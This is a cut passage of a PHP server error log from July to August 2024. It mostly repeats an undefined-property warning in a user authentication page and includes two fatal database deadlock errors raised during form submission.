23:54:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 00:54:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 01:27:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 02:09:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 02:09:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 02:33:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 03:33:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 03:35:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 04:53:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:03:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:18:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:26:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:29:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 06:07:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 06:24:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 07:24:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 08:23:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 23:19:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 01:01:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 02:07:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 03:03:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 03:08:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 04:00:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 05:18:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 05:20:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 05:58:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 06:23:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 08:13:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 08:14:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 11:51:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 23:48:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 00:35:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 00:58:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 01:03:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 01:58:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 02:29:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 02:35:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 02:49:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 03:07:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 04:47:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 05:19:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 06:11:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 08:28:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 05:42:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 14:25:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 14:27:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 14:27:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 15:40:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 15:40:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 15:41:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 16:00:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 22:55:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 00:38:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:31:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:38:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:44:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 03:48:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 04:43:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 04:47:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 04:53:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 06:14:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 06:35:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 06:55:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:25:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:25:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:26:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:26:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:28:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:36:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:46:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 08:05:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 11:47:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 13:13:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Jul-2024 02:46:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Jul-2024 05:53:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Jul-2024 06:49:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 00:27:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:09:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:09:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:16:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:50:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 12:04:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 12:55:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 13:22:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 13:22:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 13:22:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 23:45:15 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/ftmgc76wdee4/public_html/pages/submit_form.php(37): TaskFormService->insertTaskForm() #3 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [10-Jul-2024 23:45:15 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/ftmgc76wdee4/public_html/pages/submit_form.php(37): TaskFormService->insertTaskForm() #3 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [11-Jul-2024 01:59:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 02:17:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 02:53:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 03:20:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 04:20:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:29:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:48:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:55:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:55:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 09:18:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 03:12:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 03:57:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:16:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:26:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:26:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:34:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:34:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 05:13:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 05:15:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 06:51:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 08:49:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 12:15:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 12:19:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 12:22:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 06:11:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 07:02:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 10:40:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 14:37:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 00:35:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 00:36:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 01:39:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 02:06:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 04:15:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 04:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 05:32:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 05:54:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 06:57:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 07:02:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:01:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:16:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:16:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:16:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:17:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 17:06:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 03:18:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 06:15:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 06:47:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 06:51:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 09:03:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 22:11:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:10:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:14:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:20:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:57:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 04:57:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:03:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:29:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:54:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:56:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 06:04:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 06:12:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 06:43:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:15:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:21:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:22:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:23:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 23:17:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Jul-2024 04:49:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Jul-2024 07:25:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Jul-2024 08:51:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Jul-2024 00:13:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Jul-2024 03:21:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Jul-2024 12:25:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Jul-2024 03:52:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Jul-2024 06:58:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Jul-2024 04:35:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Jul-2024 22:49:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Jul-2024 22:52:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Jul-2024 01:20:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Jul-2024 00:27:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 04:49:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 05:34:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 12:09:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 12:32:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jul-2024 08:00:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jul-2024 09:44:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 05:21:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 08:12:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 09:50:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 14:06:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 04:48:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 08:39:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 08:58:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 09:00:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 10:37:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 11:59:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 12:56:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Aug-2024 07:51:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Aug-2024 07:52:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Aug-2024 06:16:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Aug-2024 11:25:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Aug-2024 01:38:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 02:43:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 03:09:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 03:14:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 04:13:43 UTC] PHP Warning: 